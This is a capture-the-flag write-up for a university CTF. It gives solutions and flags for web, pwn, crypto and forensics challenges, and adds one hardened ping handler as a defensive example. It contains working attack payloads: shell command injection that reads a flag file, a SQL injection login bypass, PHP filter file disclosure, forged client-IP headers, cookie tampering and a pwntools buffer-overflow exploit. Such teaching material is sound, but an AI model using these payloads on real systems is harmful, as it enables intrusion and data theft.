# CTF write up : EENS
Ping
---
* url: `http://eens.ee.ncku.edu.tw:5104/`
* payload:
```bash=
127.0.0.1 | cat flag/flag.txt
```
* detail: `127.0.0.1 | cat app.py`
```python=
from flask import Flask, render_template, request, url_for
import subprocess

app = Flask(__name__)


@app.route('/')
def home():
    return render_template('home.html')


@app.route('/', methods=['POST'])
def webshell():
    command = request.form['command']
    # ("vi" or ">") evaluates to the string "vi", so only "vi" is ever
    # filtered; "|", ";" and other shell metacharacters pass straight through.
    if ("vi" or ">") in command:
        output = "your command is error!!!What are you trying to do!!!"
    else:
        try:
            # shell=True with user-controlled input: command injection
            output = subprocess.check_output("ping -c1 " + command, stderr=subprocess.STDOUT, shell=True)
            print(output)
        except Exception as e:
            output = "your command is error!!!What are you trying to do!!!"
    return render_template('home.html', allCarbDiet=output)


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)
```
* details:
    * The page shows an input field for the address to `ping`.
    * Guessed straight away that the backend uses something like `subprocess`.
    * Tried `127.0.0.1 | ls` first to confirm that the pipe `|` bypasses the filter.
    * Used the exploit above to get the `flag`.
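The filter in `app.py` is broken because `("vi" or ">")` evaluates to the string `"vi"` before the `in` test, so only `vi` is ever rejected, and with `shell=True` even a complete blacklist would stay fragile. The following is an added example, not the challenge's code: a hardened handler that allowlists the target with `ipaddress` plus a hostname pattern and runs `ping` as an argv list with no shell. `weak_filter_blocks`, `validate_target`, `build_ping_argv` and `run_ping` are names chosen for this example.

```python
import ipaddress
import re
import subprocess

# One RFC 1123 hostname label: letters, digits and inner hyphens, 1-63 chars.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME = re.compile(rf"^(?=.{{1,253}}$)(?:{_LABEL}\.)*{_LABEL}$")


def weak_filter_blocks(command):
    """The challenge's check, verbatim: ("vi" or ">") is the string "vi",
    so this only rejects commands containing "vi"; "|" and ";" pass."""
    return ("vi" or ">") in command


def validate_target(target):
    """Allowlist instead of blacklist: accept a literal IP address or a
    plain hostname and nothing else (no spaces, no shell metacharacters)."""
    target = target.strip()
    if not target or target.startswith("-"):   # would be read as a ping option
        return False
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return _HOSTNAME.match(target) is not None


def build_ping_argv(target):
    """Argument vector for ping. With a list and shell=False the target is
    exactly one argv entry; no character in it is special to a shell."""
    target = target.strip()
    if not validate_target(target):
        raise ValueError("invalid ping target")
    return ["ping", "-c", "1", target]


def run_ping(target, timeout=5):
    """Hardened replacement for the check_output(..., shell=True) call."""
    result = subprocess.run(build_ping_argv(target), capture_output=True,
                            text=True, timeout=timeout)
    return result.stdout + result.stderr


if __name__ == "__main__":
    injected = "127.0.0.1 | cat flag/flag.txt"
    print("weak filter blocks payload:", weak_filter_blocks(injected))  # False
    print("allowlist accepts payload:", validate_target(injected))      # False
    print(run_ping("127.0.0.1"))
```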
* flag:`EENS{4fbaf3a4a7abdb459fc4f95fcbafb2dae920132583862c08eb4403037606e708}`
###### tags: `bypass`
EZPHP
---
* url: `eens.ee.ncku.edu.tw:5006`
* payload: `php://filter/read=convert.base64-encode/resource=index.php`
* result: the base64-encoded source of `index.php`
* base64 decode
```php=
<!DOCTYPE html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
    <p>Get me a file name, I'll read the file for you !</p>
    <p style="color:gray;"> * Try 1.txt </p>
    <form action="index.php" method="post">
        Your input: <input type="text" name="input" />
        <input type="submit" name="送出表單"/>
    </form>
<?php
// The flag for EZphp is EENS{3ccbd7b55e67a09bc085e32f6a79e2cfdfe03e8525ae2e27c92a646c679bf00c}
$ip = $_SERVER["REMOTE_ADDR"];
if ($ip == '127.0.0.1'){
    // 55Rf_1
    $content = file_get_contents("flagVGhpc0lzQUZsYWdDYW5ub3RCZUZvdW5k");
    echo $content;
}
elseif($_SERVER["HTTP_CLIENT_IP"]=='127.0.0.1' && $_SERVER["HTTP_X_FORWARDED_FOR"] =='127.0.0.1'){
    // 55Rf_2
    $content = file_get_contents("flagSWRvbnR3YW50eW91a25vdw==");
    echo $content;
}
else{
    $input .= $_POST [ 'input' ];
    $filename = trim($input);
    if (strpos($input, 'flag') !== false){
        echo "<br>";
        echo "You are a bad hacker !!!";
    }
    else{
        $content = file_get_contents($filename);
        if (preg_match("/flag/i", $content)){
            echo "<br>";
            echo "You are a bad hacker !!!";
        }
        else{
            echo "<br>";
            echo $content;
        }
    }
}
?>
</body>
</html>
```
* flag: `EENS{3ccbd7b55e67a09bc085e32f6a79e2cfdfe03e8525ae2e27c92a646c679bf00c}`
###### tags: `pseudo protocol` `php`
EZphp_2
---
* Header forge
```
X-Forwarded-For: 127.0.0.1
Client-IP: 127.0.0.1
```
* flag: `EENS{868ff5b3432facbfab5a5657aaaf7f96301b673acb532236398e1d05b26380c6}`
###### tags: `Header` `X-Forwarded-For` `Burp suite`
Try to Login
---
* url: `http://eens.ee.ncku.edu.tw:5101`
* payload:
```sql=
1' or '1'='1
```
* flag: `EENS{cf2d891cb01a75a806ca50d6d5cb3f7af532534bb649ab1fa1f11464982419f8}`
###### tags: `sql injection` `bypass`
EZphp_3
---
* payload: `http://127.0.0.1`
* flag: `EENS{ae852e946757b0a32f386aeba991abae99c25d3ed4514fd1dfe0ebe43ab653c6}`
###### tags: `ssrf`
Cookie Monster
---
* url: `http://eens.ee.ncku.edu.tw:5102`
* solution:
    * use `Burp Suite`
    * change the cookie from `user` to `admin`
```
GET /fonts/font-awesome-4.7.0/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1
Host: eens.ee.ncku.edu.tw:5102
Accept: */*
Connection: close
Cookie: level: admin; session=0ba64634-7efd-4ee3-8052-7de342d7db3d.taDtAHyw_ixod5mf6Q7NVuWRaZg; _ga=GA1.3.666780538.1583373154; _gid=GA1.3.729447486.1584775510; s_pers=%20c19%3Dpr%253Apure%2520portal%253Apersons%253Aview%7C1584262262181%3B%20v68%3D1584260460625%7C1584262262186%3B%20v8%3D1584260581398%7C1678868581398%3B%20v8_s%3DMore%2520than%252030%2520days%7C1584262381398%3B; AMCV_4D6368F454EC41940A4C98A6%40AdobeOrg=-432600572%7CMCIDTS%7C18337%7CMCMID%7C34021734364032204804614156171821970172%7CMCAID%7CNONE%7CMCOPTOUT-1584267662s%7CNONE%7CMCAAMLH-1584865262%7C11%7CMCAAMB-1584865262%7Cj8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI%7CMCSYNCSOP%7C411-18344%7CvVersion%7C4.5.2; s_fid=0B3F668660A8EC43-1554906741E9BCDC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15
Accept-Language: zh-tw
Referer: http://eens.ee.ncku.edu.tw:5102/
Accept-Encoding: gzip, deflate
```
* flag: `EENS{35ee65df86b64dbb411fa3b6b803117844819e12f8372ebec139107738527506}`
###### tags: `cookie` `burp suite`
Hello_CTF
---
* copy paste
* flag: `EENS{HeL10_C7f}`
Guess a password
---
* `strings rn.png`
* flag: `EENS{Senbonzakura_Kageyoshi}`
###### tags: `strings`
sha1
---
* Google announced the first SHA-1 collision: https://security.googleblog.com/2017/02/announcing-first-sha1-collision.html
* it provides two different PDF files with identical SHA-1 hashes but different content.
* try: `echo "1" - | nc 140.116.215.203 5001`
```bash=
Input first secret:
Input second secret:
Traceback (most recent call last):
File "sha1.py", line 16, in <module>
secret_2 = str(raw_input())
EOFError: EOF when reading a line
[21] Failed to execute script sha1
```
* exploit.py
```python=
from pwn import *
import hashlib
import base64

# the two colliding PDFs from the SHAttered release
f1 = open('shattered-1.pdf', 'rb').read()
f2 = open('shattered-2.pdf', 'rb').read()

# hash each file on its own; the two digests are identical
print(hashlib.sha1(f1).hexdigest())
print(hashlib.sha1(f2).hexdigest())

conn = remote('140.116.215.203', 5001)
conn.recvuntil(b'Input first secret:')
conn.sendline(base64.b64encode(f1))
conn.recvuntil(b'Input second secret:')
conn.sendline(base64.b64encode(f2))
conn.interactive()
```
* flag: `EENS{974c7afceb5175b6b17ae7017827b6a6e8027c172dcb80cf53e52829f9cd222a}`
Translate Me
---
* exploit
```python=
cipher = 'MHBFOBNMAOPSQWDVSFCUACSTBDRMOMSKGRZQHALJRNJSRRGLSREUFSLC'
key = 'IDONTTHINKYOOOOOOOUCANSLOVETHISSOJUSTGIVEUPANDTAKEABREAK'
dic = {}
base = 64


def decode(dic, c, k):
    # position of the cipher letter in the table row of key letter k,
    # shifted by 64 so the position maps onto an ASCII uppercase letter
    i = dic[k].index(c)
    i += base
    return chr(i)


with open('cipher.txt') as f:
    # the first three lines of the table file are headers
    for _ in range(3):
        print(f.readline())
    # 26 rows of the form "K|A B C ... Z"
    for _ in range(26):
        tmp = f.readline().split('|')
        dic[tmp[0]] = tmp[1].replace('\n', '').split(' ')

flag = ''
for c, k in zip(cipher, key):
    if c == '{' or c == ' ' or c == '}':
        flag += c
    else:
        flag += decode(dic, c, k)
print(flag)
```
* flag: `EENS{VIGENERE CIPHER IS A PAIN IN THE ASS IF YOU DONT USE ONLINE TOOLS}`
You can't type
---
* use https://www.onlineocr.net to OCR the image into text
* flag: `EENS{이것이 나의 첫 CTF입니다}`
Could you login?
---
* pwn_1.c
```clike=
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* global buffers: pass[] is immediately followed by allow[] */
char acc[10];
char pass[10];
char allow[4];

int main() {
    strcpy(allow, "no");
    FILE *fd = fopen("secret.txt", "r");
    char username[10], password[10], flag[256];
    fscanf(fd, "%s", username);
    fscanf(fd, "%s", password);
    fscanf(fd, "%s", flag);
    printf("Username: \n");
    fflush(stdout);
    scanf("%s", acc);            /* unbounded read */
    fflush(stdout);
    printf("Password: \n");
    fflush(stdout);
    scanf("%s", pass);           /* unbounded read: can spill into allow[] */
    fflush(stdout);
    if ((!strcmp(acc, username)) && !(strcmp(pass, password)))
        strcpy(allow, "yes");
    if (!strcmp(allow, "yes"))
        printf("Nice!\n%s\n", flag);
    else
        printf("You are bad guy so you cannot access!\n");
    fflush(stdout);
    return 0;
}
```
* exploit.py
```python=
from pwn import *

conn = remote('140.116.215.203', 5201)
conn.recvuntil(b'Username:')
conn.sendline(b'a')
conn.recvuntil(b'Password:')
# 10 bytes fill pass[]; the next 3 land in allow[]
conn.sendline(b'b' * 10 + b'yes')
conn.interactive()
```
* a classic buffer overflow
* flag: `EENS{7his_Is_a_Simp1e_Buffer_0VERF1ow_practice.}`
###### tags: `overflow`
God of Mental Arithmetic
---
* exploit.py
```python=
from pwn import *


def solve(q):
    # strip the question's decoration, leaving e.g. "12+34"
    q = q.replace('?', '').replace(' ', '').replace('=', '')
    if '+' in q:
        a, b = q.split('+')
        return str(int(a) + int(b))
    a, b = q.split('-')
    return str(int(a) - int(b))


conn = remote('140.116.215.203', 5005)
for i in range(100):
    conn.recv()
    # the question is the second-to-last line of the next chunk
    q = conn.recv().decode('utf-8').split('\n')[-2]
    conn.sendline(solve(q).encode())
conn.interactive()
```
* flag: `EENS{a52e4d6f04166133d4e3e70aeec1e393d6c8dafdd0de138c51cf7be64483ffb6}`
Eat more and more
---
* given `a.out`
* description: get 500 to win
* reverse with `ghidra`: find a `scores` symbol
* `gdb`
```shell=
(gdb) b main
(gdb) info address scores
# note the address printed for the symbol scores
(gdb) set {int}<address> = 500
(gdb) c
```
* flag: `EENS{Be_Patient_AND_ENJOY_THIS_GAME!!!!}`
###### tags: `ghidra` `gdb` `reverse`
Kids doodle
---
* `hexdump flag.png` -> `89 50 55 47`
* png format: `89 50 4E 47`
* [reference](https://asecuritysite.com/forensics/magic)
* exploit.py
```python=
# PNG signature is 89 50 4E 47 0D 0A 1A 0A; byte 2 was changed to 0x55 ('U')
with open('flag.png', 'rb') as f:
    data = bytearray(f.read())
data[2] = 0x4E   # restore 'N'
with open('exploit.png', 'wb') as f:
    f.write(data)
```
* the repaired image is a QR code that decodes to: `RUVOU3tsYXM7ZG4sbXp3a2VqdGtzenguY252enhjdn0=`
* flag: `EENS{las;dn,mzwkejtkszx.cnvzxcv}`
###### tags: `forensics` `magic number`
Go upstairs without elevator
---
* exploit
```python=
import subprocess
from glob import glob

lists = ['./850+236.zip']


def cal(path):
    # file name "a+b.zip" -> password str(a+b)
    p = path.replace('./', '')
    q = p.split('.')[0]
    a, b = q.split('+')
    return str(int(a) + int(b))


def unzip(path):
    ans = cal(path)
    subprocess.run(['unzip', '-P', ans, path], check=True)
    # the archive holds the next stage; return the zip we have not seen yet
    files = glob('./*.zip')
    for f in files:
        if f not in lists:
            return f
    return None


target = './850+236.zip'
while target is not None:
    new = unzip(target)
    lists.append(new)
    target = new
```
* flags: `EENS{Th3r3_ls_th3_FIag_TEN50fTHOUSAND50f_STAGE5_AND_1I11l1ll1l1l1ll1lIIll1III1}`
Chained Connie
---
* exploit
```python=
import requests

flag = []
for i in range(0, 30):
    # each page carries one piece of the flag in a custom response header
    r = requests.get(f'http://eens.ee.ncku.edu.tw:5103/search?p={i}')
    flag.append(r.headers['flag'])
print(''.join(flag))
```
* flag: `EENS{Not_only_block_can_chain}`
zip the zip
---
* exploit
    * use `https://github.com/Ethonwu/Zip-file-crack-using-dictionary`
    * with `rockyou.txt`
    * password: `zxcvbnm`
* flag: `EENS{Whether_'tis_nobler_in_the_mind_to_suffer}`